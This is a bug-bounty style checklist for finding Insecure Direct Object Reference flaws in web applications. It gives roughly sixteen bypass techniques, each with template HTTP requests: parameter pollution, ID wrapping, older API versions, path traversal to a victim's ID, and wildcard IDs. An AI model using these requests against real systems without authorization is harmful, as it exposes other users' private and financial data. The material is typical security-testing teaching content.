Insecure Direct Object Reference

IDOR Checklist

Basics

​https://owasp.org/www-project-top-ten/2017/A5_2017-Broken_Access_Control.html For example, let's say we're logging into our bank account, and after correctly authenticating ourselves, we get taken to a URL like this https://example.com/bank?account_number=1234. On that page we can see all our important bank details, and a user would do whatever they needed to do and move along their way thinking nothing is wrong. There is however a potentially huge problem here, a hacker may be able to change the account_number parameter to something else like 1235, and if the site is incorrectly configured, then he would have access to someone else's bank information.

How to Find

  1. 1.
    Add parameters onto the endpoints for example, if there was
GET /api/v1/getuser
[...]
Try this to bypass
GET /api/v1/getuser?id=1234
[...]
  1. 1.
    HTTP Parameter pollution
POST /api/get_profile
[...]
user_id=hacker_id&user_id=victim_id
  1. 1.
    Add .json to the endpoint
GET /v2/GetData/1234
[...]
Try this to bypass
GET /v2/GetData/1234.json
[...]
  1. 1.
    Test on outdated API Versions
POST /v2/GetData
[...]
id=123
Try this to bypass
POST /v1/GetData
[...]
id=123
  1. 1.
    Wrap the ID with an array.
POST /api/get_profile
[...]
{"user_id":111}
Try this to bypass
POST /api/get_profile
[...]
{"id":[111]}
  1. 1.
    Wrap the ID with a JSON object
POST /api/get_profile
[...]
{"user_id":111}
Try this to bypass
POST /api/get_profile
[...]
{"user_id":{"user_id":111}}
  1. 1.
    JSON Parameter Pollution
POST /api/get_profile
[...]
{"user_id":"hacker_id","user_id":"victim_id"}
  1. 1.
    Try decode the ID, if the ID encoded using md5,base64,etc
GET /GetUser/dmljdGltQG1haWwuY29t
[...]
dmljdGltQG1haWwuY29t => [email protected]​
  1. 1.
    If the website using graphql, try to find IDOR using graphql!
GET /graphql
[...]
GET /graphql.php?query=
[...]
  1. 1.
    MFLAC (Missing Function Level Access Control)
GET /admin/profile
Try this to bypass
GET /ADMIN/profile
  1. 1.
    Try to swap uuid with number
GET /file?id=90ri2-xozifke-29ikedaw0d
Try this to bypass
GET /file?id=302
  1. 1.
    Change HTTP Method
GET /api/v1/users/profile/111
Try this to bypass
POST /api/v1/users/profile/111
  1. 1.
    Path traversal
GET /api/v1/users/profile/victim_id
Try this to bypass
GET /api/v1/users/profile/my_id/../victim_id
  1. 1.
    Change request content type
Content-type: application/xml
Try this to bypass
Content-type: application/json
  1. 1.
    Send wildcard instead of ID
GET /api/users/111
Try this to bypass
GET /api/users/*
  1. 1.
    Try google dorking to find new endpoint
Reference: